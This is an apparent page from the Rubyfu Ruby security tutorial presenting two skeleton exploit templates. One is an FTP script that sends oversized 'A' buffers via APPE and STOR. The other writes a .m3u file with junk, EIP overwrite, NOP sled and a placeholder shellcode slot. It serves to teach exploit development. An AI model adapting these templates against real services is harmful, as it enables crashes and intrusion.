Rubyfu
Rubyfu
Twitter
Github
Module 0x0 | Introduction
Contribution
Beginners
Required Gems
Module 0x1 | Basic Ruby Kung Fu
Module 0x2 | System Kung Fu
Module 0x3 | Network Kung Fu
Module 0x4 | Web Kung Fu
Module 0x5 | Exploitation Kung Fu
Fuzzer
Calling Windows APIs
Metasploit
metasm
Module 0x6 | Forensic Kung Fu
References
FAQs
Contributors
Powered by GitBook

Module 0x5 | Exploitation Kung Fu

Skeleton exploit

It's really a good thing to have a skeleton exploit to edit and use quickly during your exploitation process.

Network base

#!/usr/bin/env ruby
# KING SABRI | @KINGSABRI
require 'socket'
​
buffer = "A" * 2000
​
#--> Networking
host = ARGV[0]
port = ARGV[1] || 21
​
s = TCPSocket.open(host, port)
s.recv(1024)
puts "[+] Sending Username."
s.send("USER ftp\r\n", 0)
s.recv(1024)
puts "[+] Sending Password."
s.send("PASS ftp\r\n", 0)
s.recv(1024)
puts "[+] Sending Evil buffer..."
s.send("APPE " + buffer + "\r\n", 0)
total = s.send("STOR " + buffer + "\r\n", 0)
#--> Exploit Info
puts "[+] " + "Total exploit size: " + "#{total} bytes."
puts "[+] " + " Buffer length: " + "#{buffer.size} bytes."
puts "[+] Done"
​
s.close

To execute it

ruby ftp_exploit.rb [TARGET] [PORT]

Notice that some services has to receive from it and some does not.

File base

Creating a simple exploit file

#!/usr/bin/env ruby
# KING SABRI | @KINGSABRI
​
file = ARGV[0] || "exploit.m3u"
​
junk  = "A" * 2000
eip   = "B" * 4
nops  = "\x90" * 8
shell = "S" * 368
exploit = junk + eip + nops + shell
​
File.open(file, 'w') {|f| f.write(exploit)}
puts "[*] Exploit size: #{exploit.size}"

To execute it

ruby m3u_exploit.rb song1.m3u
Previous
LDAP injection
Next
Fuzzer
Last updated 2 years ago
Edit on GitHub
Contents
Skeleton exploit
Network base
File base